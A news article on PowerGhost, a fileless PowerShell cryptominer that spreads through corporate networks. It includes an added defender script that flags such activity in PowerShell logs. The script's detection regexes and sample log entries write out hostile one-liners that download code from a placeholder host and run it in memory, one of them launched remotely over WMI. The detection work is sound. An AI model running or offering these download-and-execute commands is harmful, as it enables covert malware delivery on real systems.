
PowerGhost shell script leverages fileless techniques to scare up a cryptominer

Cybercriminals have created a newly discovered PowerShell-based malware program that spreads cryptomining software across infected businesses' local area networks using various fileless techniques, including the EternalBlue exploit.

Dubbed PowerGhost, the malware "is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers," warns a July 26 blog post from Kaspersky Lab, whose researchers uncovered the threat.

According to post co-authors and researchers Vladas Bulavas and Anatoly Kazantsev, the actors behind this campaign use exploits or remote administration tools to initially infect targets with the obfuscated, single-line PowerShell script. At that point, the script immediately downloads and executes the miner without writing it to the hard drive, launching the software by loading a PE file via reflective PE injection.

The modular PowerGhost script propagates itself across networks by leveraging the EternalBlue remote code execution exploit, as well as by using the credential extraction tool Mimikatz to grab user account credentials from infected machines. These credentials are then used to log on to additional machines before the script launches a copy of itself via WMI (Windows Management Instrumentation).

When it does successfully land on a new network machine, PowerGhost next tries to escalate its privileges using multiple Microsoft Windows exploits.
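The behaviours described above (an obfuscated one-line PowerShell launcher, a download-and-execute step that never writes the miner to disk, in-memory PE loading, and remote execution over WMI) all leave traces in PowerShell script block logging. The following added example, which is not code from the article or from Kaspersky, shows a defender-side triage script that scores script block log text against generic heuristics for those patterns. The indicator regexes, the weights, the alert threshold and every sample log entry are constructed for illustration; none of them are PowerGhost IoCs.

```python
"""Heuristic triage of PowerShell script-block log text for fileless
tradecraft of the kind the PowerGhost write-up describes: download cradles
that execute in memory, reflective/in-memory PE loading, and lateral
movement through remote WMI process creation.

Added example. The indicator table, weights, threshold and sample entries
below are constructed defender heuristics, not published IoCs.
"""
import re
from typing import Dict, List, Tuple

# Hypothetical indicator table: name -> (compiled regex, weight).
# The patterns are generic PowerShell signals seen in many campaigns,
# chosen here to match the behaviours named in the article.
INDICATORS: Dict[str, Tuple[re.Pattern, int]] = {
    # Remote content fetched straight into the session (no file written)
    "download_cradle": (re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest", re.I), 2),
    # Fetched text evaluated as code
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    # Base64 one-liner passed with -e / -enc / -EncodedCommand
    "encoded_command": (re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I), 2),
    # In-memory assembly or PE loading instead of running a file from disk
    "reflective_load": (re.compile(r"\[System\.Reflection\.Assembly\]::Load|ReflectivePEInjection", re.I), 3),
    # Process creation on another host via WMI
    "wmi_remote_exec": (re.compile(r"Invoke-WmiMethod.*-Class\s+Win32_Process|Win32_Process.*\bCreate\b", re.I | re.S), 3),
    # Hidden console window, a common launcher option
    "hidden_window": (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), 1),
}

# Constructed threshold: two medium-weight signals or one strong plus one weak.
ALERT_THRESHOLD = 4


def score_script_block(text: str) -> Dict[str, object]:
    """Return the matched indicator names, their summed weight and an alert flag
    for a single script block (one log entry)."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {"hits": hits, "score": score, "alert": score >= ALERT_THRESHOLD}


def triage(log_entries: List[str]) -> List[Dict[str, object]]:
    """Score every entry, keeping its index so a finding can be traced back."""
    return [dict(index=i, **score_script_block(entry)) for i, entry in enumerate(log_entries)]


def alerts(log_entries: List[str]) -> List[int]:
    """Indices of the entries whose score reaches the alert threshold."""
    return [r["index"] for r in triage(log_entries) if r["alert"]]


# Constructed sample script-block text. example.invalid is a reserved
# name and the base64 blob is an arbitrary placeholder, not a real payload.
SAMPLE_LOG: List[str] = [
    # 0: ordinary administrative command, should not alert
    r"Get-ChildItem C:\Logs | Where-Object { $_.Length -gt 1MB }",
    # 1: hidden-window launcher that fetches and evaluates remote code in memory
    r"powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')\"",
    # 2: remote process creation over WMI carrying an encoded one-liner
    r"Invoke-WmiMethod -ComputerName SRV01 -Class Win32_Process -Name Create "
    r"-ArgumentList 'powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA'",
    # 3: bytes downloaded and loaded directly into memory, never written to disk
    r"$b = (New-Object Net.WebClient).DownloadData('http://example.invalid/m.bin'); [System.Reflection.Assembly]::Load($b)",
]


if __name__ == "__main__":
    for result in triage(SAMPLE_LOG):
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} entry {result['index']}: score={result['score']} hits={result['hits']}")
```

The point of weighting rather than matching single keywords is that each signal on its own is common in legitimate administration (operators do use `Invoke-WmiMethod` and `Invoke-WebRequest`); it is the combination of fetch-and-evaluate, in-memory loading and remote process creation in one block that matches the fileless pattern the researchers describe. Script block logging (Event ID 4104) is the input this would run over in practice, since the obfuscated launcher is decoded by the time it reaches that log.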

So far PowerGhost sightings have been most frequent in India, Brazil, Colombia and Turkey, reports Kaspersky, whose researchers even found one version of the script that included a DDoS tool component.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts, video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
